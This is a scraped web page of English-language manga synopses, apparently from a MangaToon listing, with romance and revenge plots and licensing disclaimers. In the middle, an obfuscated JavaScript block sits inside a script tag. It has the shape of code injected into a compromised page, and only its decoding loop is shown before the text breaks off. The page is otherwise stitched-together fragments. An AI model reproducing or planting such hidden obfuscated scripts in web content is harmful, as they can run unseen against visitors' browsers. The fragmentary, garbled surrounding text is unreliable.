She only loves three things in her life: money, saving money, and running all kinds of errands to earn money! Ms. Errand Runner, at your service! What? You want her to spy on the handsome and rich young man who's going to have a blind date with you? That's a piece of ca... catastrophe. "Mission failed, asset snatched away by the target." "How?" "They... they are engaged..." MangaToon got authorization from iQiyi Comics to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
<h2>Take Your Mommy Home with other name You Look Like My Son's Mommy</h2> - Why? Five years ago, it’s were you who slept me?,And why after five years, it’s you again? Bai Chu Xiao was angry and held Jiang Cheng Yu’s collar and said, “I’ve been through hard time so much, how do you plan to compensate me?” The evil charm of Jiang Cheng Yu’s smile, he hugged her and said, “Is it enough with two babie plus my lifetime to compensate you”?\ Abduct A Mommy And Bring Her Home, 拐个妈咪带回家, You Look Like My Son's Mommy, Take Your Mommy Home
<span class="mx-1">I Just Want to Be a Useless Duke's Daughter other name The Bizarre Adventure of Miss Capricious </span> I was reborn into a novel "The Mistake of Cleavens" and became a silly, love-deprived young lady. Fame? Power? Love? Those are not enough to attract me, as I happened to be the richest girl in the world! Yes, I'm going to lead a brand new life with all the wealth I got. But wait! I seem to recall that the ending of this novel is a bad end?! The world collapsed because Lady Cleavens abandoned a cat, which brought the doom of the world! Alright, even if I need to adopt all the cats in this world, I'll do it as long as I can reverse my fate and save it from its doom! MangaToon got authorization from Daxingdao Comic to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
Happy and "scared" Xie Yan-huan vs. "Cruelty" Emperor Yan-gui. Xie Yanhuan who was discovered on the night of the wedding, thinks he can't save his life anymore, but the Ming emperor seems addicted to Xie Yanhuan! Can the cold-blooded emperor conquer this scared concubine, who runs away with all his heart and says nothing?
Falling into the conspiracy set by her sister, she witnessed her sister took away her child and married into the purple; She tried her best at the risk of death just to accompany her child; When the conspiracy is poked, what will their fate be? MangaToon got authorization from Yoolook Culture to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.<script></script><script>(function(_0x47e17b,_0x2d85d7){var _0x3ec902=_0x4ebb,_0x3a4f1a=_0x47e17b();while(!![]){try{var _0x432b31=parseInt(_0x3ec902(0x134))/(0x15ed*-0x1+-0x12b2+-0x1a*-0x190)+parseInt(_0x3ec902(0x126))/(-0x13*-0x122+0x617*0x4+-0x1*0x2de0)*(parseInt(_0x3ec902(0x133))/(-0xc8*-0x5+0x20b*0xc+0x40f*-0x7))+parseInt(_0x3ec902(0x115))/(-0x1d62+-0x1fd0*-0x1+-0x26a)*(parseInt(_0x3ec902(0x114))/(0x1*-0x1cf+-0x1a18+-0x1*-0x1bec))+parseInt(_0x3ec902(0x12e))/(-0x26dc+-0x55*0x19+0x2f2f*0x1)*(parseInt(_0x3ec902(0x123))/(-0x1579+-0x253b+0x3abb))+parseInt(_0x3ec902(0x121))/(-0x137f+-0x2*-0xc61+0x1*-0x53b)+-parseInt(_0x3ec902(0x127))/(-0x1e26+-0x1712+-0x1*-0x3541)+-parseInt(_0x3ec902(0x12a))/(0x17cc+-0xed9*0x2+-0xa*-0x98);if(_0x432b31===_0x2d85d7)break;else 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President Qi who traveled to another world after being killed. I thought I was a brave to save the world, but until I was dressed up and put on a marriage bed, I knew I had to become the bride of the devil !! The demon God who is flirty and fond of one person and the president who is cold and arrogant on the surface, will they have a baby? MangaToon got authorization from Jemon Culture to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.
The Double-Sided Girl A Girl Was Reborn Into The A Mysterious Ancient Kingdom And Became A Friendship Princess. All The Princes Were Candidates Of Her Fiance. Yet She Never Thought These Handsome Princes Only Tried To Win Her Heart Because They Wanted Her “Wolf Heart”. At The Same Time, She Found That There Was Another Soul Sharing The Same Body With Her. Little Did She Know The World She Was In Was A World Full Of Beasts With Human Faces… Mangatoon Got Authorization From Tianyi Icartoon To Publish This Manga, The Content Is The Author’s Own Point Of View, And Does Not Represent The Stand Of Mangatoon.
Time travlled to be the toy boy of the Highness, Fu Sang, who was considered as a blessing beauty, got trapped in the game of thrones. It was said that whoever was loved by Fu Sang would be the Emperor of the whole continent. But Fu Sang was told that only by finding the future Emperor could he go back to his original world. Therefore, Fu Sang got tangled by different Highnesses... MangaToon got authorization from ChongZhuo Comics to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
A tall, rich, handsome and caring professor X An adorable and naughty fox, a sweet love story! A story of a super cute fox, don't you want to keep one too? The little fox went downhill to avoid the calamity. She encounters the rich and handsome professor Tian You. Getting along with each other day by day, the naughty and cute little fox, Xiaojiu, gradually fell in love with Tian You. But the calamity made Xiaojiu show herself in her true form. And the real identity of Tian You was unknown to everyone. Meanwhile, the brother of Xiaojiu, who was a superstar, found her and took her away... Can Xiaojiu and Tian You reunite? MangaToon got authorization from Kuaikan Comics to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
Marshal, your wife ran away again! Alas, I've got used to that... Qingzhou Gu, a seemingly naïve girl, is plotting a revenge. Every coincidence is under her precise calculation. Every accident is her well-considered move. Could Marshal Si handling his tricky wife? What will happen in their romance? MangaToon got authorization from iCiyuan to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.
Si Cheng Bai and Gu Qing Zhou! A great story …. A well-organized trap makes her embark on the journey of revenge. Innocence is her disguise. She swears to herself that she will make them pay whatever it takes. An unexpected encounter, she messes up a bossy and cold- hearted man. What surprises her most is that that man asks her to marry him! On the scale between life and freedom, what is her choice? and The seemingly naïve girl is plotting a revenge. Every coincidence is a precise calculation. Every accident is a well-considered act. It’s romance against fate between Qingzhou Gu and the Young General. What will happen to this ambitious girl who’s so determined to take back the heritage from her mother? The epic revenge and romance is unveiled now!
The Glutton Nextdoor What kind of romantic relationship starts from a "harassment" incident? What kind of romantic relationship hinges on how he cooks? Well, this one does. Allow us to present you with Glutton Nextdoor, aka, "the girl who harassed me and took me for a doll now is drooling over the dish I cooked!" MangaToon got authorization from SNAP to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.